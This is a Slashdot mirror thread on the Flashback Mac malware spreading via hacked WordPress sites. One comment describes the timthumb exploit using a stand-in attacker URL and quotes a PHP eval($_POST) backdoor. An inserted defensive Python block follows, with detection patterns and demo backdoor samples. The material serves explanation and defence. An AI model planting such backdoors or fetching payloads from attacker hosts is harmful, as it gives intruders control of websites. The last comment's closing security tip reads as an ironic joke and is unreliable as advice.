Slashdot Mirror


Mac Flashback Attack Began With Wordpress Blogs

With more on the Flashback malware plaguing many Macs, beaverdownunder writes with some explanation of how the infection grew so quickly: "Alexander Gostev, head of the global research and analysis team at Kaspersky, says that 'tens of thousands of sites powered by WordPress were compromised. How this happened is unclear. The main theories are that bloggers were using a vulnerable version of WordPress or they had installed the ToolsPack plug-in.'"

6 of 103 comments

  1. In the end, it's better that it happened by skipkent · Score: 5, Insightful

    At its height it was never as bad as some of the Windows viruses have been, but it plants the seed that Macs aren't safe and are just as vulnerable as any other OS.

    1. Re:In the end, it's better that it happened by oldlurker · Score: 5, Informative

      Where did you hear this? At the cooler in Redmond?

      From the numbers it doesn't seem like an unlikely claim actually (single virus compromising percentage of installed base), though a citation would be nice so it made me check (source for numbers below):

      The Mac Flashback virus compromised around 600,000 Macs, which is around 1% of the installed base.
      The single largest Windows-based infection ever was Conficker. At its peak in 2009, it infected about 0.7% of the total Windows installed base.

    2. Re:In the end, it's better that it happened by tao · Score: 5, Funny

      Now we just need a botnet for Hurd... 1 infected computer would be enough for, say... 100% of the user base :)

    3. Re:In the end, it's better that it happened by WrongSizeGlass · Score: 5, Informative

      I say make it worse next time! And, target all OS's!

      The Java exploit used to spread Mac Flashback wasn't Mac specific, it just went unpatched for several months longer on OS X than on Windows. All the while almost all Mac users surfed the internet with a false sense of impunity.

      I don't think any researchers have tried to figure out how many PCs were affected by the same Java exploit, but the impact this has had on the Mac user mindset - and Apple's security responses - should be rather sobering.

  2. Wordpress wasn't that vulnerable, timthumb was. by Anonymous Coward · Score: 5, Informative

    "How this happened is unclear. The main theories are that bloggers were using a vulnerable version of WordPress or they had installed the ToolsPack plug-in."

    This is not unclear at all. There were a few security problems with WP in the last year. But a LOT of themes use the timthumb.php module to do dynamic rescaling of images. Timthumb used to be extremely vulnerable: you could download a file from http://www.youtube.com.attacker-domainname/anything.php, install it in timthumb's cache and have full access like forever.

    Updating WP wouldn't do any good, as a fully updated WP installation can still run a vulnerable theme. Even when the flaws in timthumb were fixed and the theme is updated, these sites have been flooded with backdoors, varying from eval($_POST['a']) in wp-config.php to newly created admin users. (Admin users can edit .php files from /wp-admin, an admin user effectively has power to run any php code desired.)

    I've manually removed and analysed infections from several customers' WordPress websites; all were hit by timthumb exploits. Some of these websites had literally dozens of backdoors, each of which gave full access to the site. I've seen malware that hid from googlebot to avoid detection. I've seen infections with timers, and infections that kept an IRC connection open to accept commands. These infections were just waiting for the right moment to be abused.
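Two defender-side checks that follow from this comment, written here as an added example (not code from the thread, from WordPress or from timthumb): a remote-host allowlist check that does not fall for a hostname like "www.youtube.com.attacker-domainname", and a small static scan of a WordPress tree for the artefacts the comment describes (eval() fed from a superglobal in wp-config.php, and .php files sitting in a thumbnail cache directory). The allowlist entries, directory names and sample file contents are constructed for the demo.

```python
"""Added example, not part of the Slashdot thread or of any WordPress/timthumb code.

1. host_allowed(): the allowlist check a remote-image fetcher needs. The naive
   substring test accepts any URL that merely contains "youtube.com"; the proper
   check parses the URL and requires the hostname to equal an allowed host or be
   a subdomain of it.
2. scan_for_backdoors(): a heuristic scan for the leftovers the comment lists:
   eval() of request data, eval() of an obfuscated blob, and executable PHP
   inside a cache directory.

ALLOWED_HOSTS, CACHE_DIR_NAMES and the demo site layout are constructed here.
"""
import os
import re
import tempfile
from urllib.parse import urlsplit

ALLOWED_HOSTS = ("youtube.com", "flickr.com")   # constructed allowlist
CACHE_DIR_NAMES = {"cache", "tmp"}               # timthumb kept fetched files in a cache/ dir
PHP_SUFFIXES = (".php", ".phtml")


def naive_host_allowed(url: str) -> bool:
    """The flawed pattern: substring match anywhere in the URL."""
    return any(h in url for h in ALLOWED_HOSTS)


def host_allowed(url: str) -> bool:
    """Parse the URL, take only the hostname, then exact or subdomain match."""
    host = (urlsplit(url).hostname or "").lower().rstrip(".")
    return any(host == h or host.endswith("." + h) for h in ALLOWED_HOSTS)


# (label, regex) pairs; each regex is applied per line of every PHP file.
BACKDOOR_PATTERNS = [
    ("eval-of-superglobal",
     re.compile(r"eval\s*\(\s*\$_(POST|GET|REQUEST|COOKIE)\b")),
    ("eval-of-decoded-blob",
     re.compile(r"eval\s*\(\s*(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(")),
]


def scan_for_backdoors(root: str):
    """Return sorted (label, relative path, line number) tuples; 0 = whole-file finding."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        in_cache = os.path.basename(dirpath).lower() in CACHE_DIR_NAMES
        for name in files:
            if not name.lower().endswith(PHP_SUFFIXES):
                continue                     # images in the cache are expected
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            if in_cache:
                findings.append(("php-in-cache-dir", rel, 0))
            with open(path, encoding="utf-8", errors="replace") as fh:
                for lineno, line in enumerate(fh, 1):
                    for label, rx in BACKDOOR_PATTERNS:
                        if rx.search(line):
                            findings.append((label, rel, lineno))
    return sorted(findings)


def build_demo_site() -> str:
    """Create a constructed WordPress-like tree in a temp dir and return its path."""
    root = tempfile.mkdtemp(prefix="wp-demo-")
    samples = {
        "wp-config.php":
            "<?php\ndefine('DB_NAME', 'wp');\neval($_POST['a']);\n",
        "wp-content/themes/t/timthumb.php":
            "<?php\n// ordinary theme file, nothing to flag\nheader('Content-Type: image/png');\n",
        "wp-content/themes/t/cache/anything.php":
            "<?php eval(base64_decode('...'));\n",
        "wp-content/themes/t/cache/img.png":
            "not really a PNG, just a non-PHP file in the cache",
    }
    for rel, body in samples.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    evil = "http://www.youtube.com.attacker-domainname/anything.php"
    print("naive check accepts attacker host:", naive_host_allowed(evil))
    print("proper check accepts attacker host:", host_allowed(evil))
    for finding in scan_for_backdoors(build_demo_site()):
        print(finding)
```

The scan is deliberately a heuristic: it will miss backdoors built with other obfuscation and will flag the odd legitimate plugin, so treat hits as triage input, not a verdict. In a real cleanup the stronger check is comparing every core, theme and plugin file against a clean copy's checksums, which also surfaces the unexpected admin users' handiwork the comment mentions.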

  3. Mac People are awake now, this is a good thing! by anthony_greer · Score: 5, Interesting

    I have had non-technical Mac users ask me about this; that means that they (or at least more of them than before) are open to advice about security and don't just smugly boast about Macs being invincible any longer. This makes everyone safer from my view.

    BTW the advice I give Mac users who ask is as follows:
    1: run Apple menu->Software Update manually at least once a week, and download everything it suggests*
    2: use a non-admin account for daily activity and NEVER provide admin creds unless you know exactly what it is using them for; you should never need to do this while surfing the web.
    3: Only get software from trusted sources, like the App Store, SourceForge, or vendor web sites like Adobe or Autodesk.
    4: Switch to a platform where Java is controlled and updated by the first party, Oracle, and not a third party, Apple, to ensure you have the best security possible.

    *Just as with Windows or any other *NIX box, there is an exception to the update-everything rule: if you know that an update will break your workflow or some component thereof, you can skip it while that is worked out.